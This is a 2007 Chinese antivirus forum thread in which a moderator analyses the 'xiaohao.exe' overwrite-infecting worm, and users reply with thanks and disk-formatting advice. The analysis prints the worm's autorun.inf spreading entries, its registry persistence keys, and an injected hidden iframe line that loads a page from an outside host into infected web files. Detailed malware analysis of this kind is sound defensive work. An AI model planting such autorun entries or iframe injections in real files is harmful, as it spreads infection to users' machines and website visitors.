瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 警惕恶性蠕虫病毒"xiaohao.exe"(浩字病毒)!
newcenturymoon - 2007-8-14 23:06:00
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
Size: 12288 bytes
File Version: 1, 0, 0, 1
Modified: 2007年8月14日, 21:03:22
MD5: B50ED06B61CDCF060D0136784999E50C
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
CRC32: 5CC1E47A
加壳方式:UPX
病毒运行后:
1.生成如下文件:
%SystemRoot%\system32\exloroe.exe
每个分区下生成一个xiaohao.exe 和autorun.inf
autorun.inf内容
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shell\Auto\command=Xiaohao.exe
2.添加注册表项目
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的
3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000
破坏显示隐藏文件
删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2
从而删除开始菜单中所有的快捷方式
4.感染文件
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的
exe无法修复
从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码
<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
所有感染的文件的文件名记录在C:\Jilu.txt里面
并将所有未能感染的文件属性变为隐藏
5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”
6.系统时间改为2005年1月17日
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉
至发此篇日志为止已经发现卡卡社区有用户感染,希望大家注意如下几点防范此类病毒
1.及时升级杀毒软件,防火墙,一定打全系统补丁
2.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可。


附件: 5543452007814225552.jpg
newcenturymoon - 2007-8-14 23:06:00
附图

附件: 5543452007814225614.jpg
newcenturymoon - 2007-8-14 23:06:00
附图

附件: 5543452007814225627.jpg
newcenturymoon - 2007-8-14 23:07:00
附图

附件: 5543452007814225639.jpg
超级游戏迷 - 2007-8-14 23:14:00
斑竹辛苦了,此文我收藏了。
流星陨落 - 2007-8-14 23:50:00
不知道剑盟有没有人发这个样本

感谢楼主分析结果,方便我对日志区的回复
hanjunbin - 2007-8-14 23:50:00
版主 辛苦了 !!!!
那么快就出了报告!
请问 解决方法什么时候可以出啊?
最近的病毒都是那样 烦死了。。。
newcenturymoon - 2007-8-14 23:59:00
没好的解决方法  格式化磁盘吧
流星陨落 - 2007-8-15 0:08:00
刚刚拿到样本,发现瑞星能杀了,希望其他用户赶快升级防御。我的新硬盘还没到货,没有空间安装虚拟机了,还是等待版主大人赶快出解毒方案。
taylor05771 - 2007-8-15 8:49:00
瑞星防火墙用户 加载bbs.hzva.org 的规则包即可阻拦此类病毒入侵


中毒用户 由于病毒覆盖了原文件的 icon
无挽救办法,全盘格吧
暗焰欣空 - 2007-8-15 9:34:00
相当BT的DD
HOSTのS - 2007-8-15 9:42:00
收藏.......
日不懂啊 - 2007-8-15 11:19:00
是够恶性的~~~顶,阳光!
木法沙 - 2007-8-15 11:25:00
唉,哪个有毛病的人制作的烂病毒啊!真可恶!
大庆女人 - 2007-8-20 16:12:00
太厉害了................
这病毒一感染就造成重大损失,无法挽回!病毒作者是炫耀自己还是获取利益呀!
1
查看完整版本: 警惕恶性蠕虫病毒"xiaohao.exe"(浩字病毒)!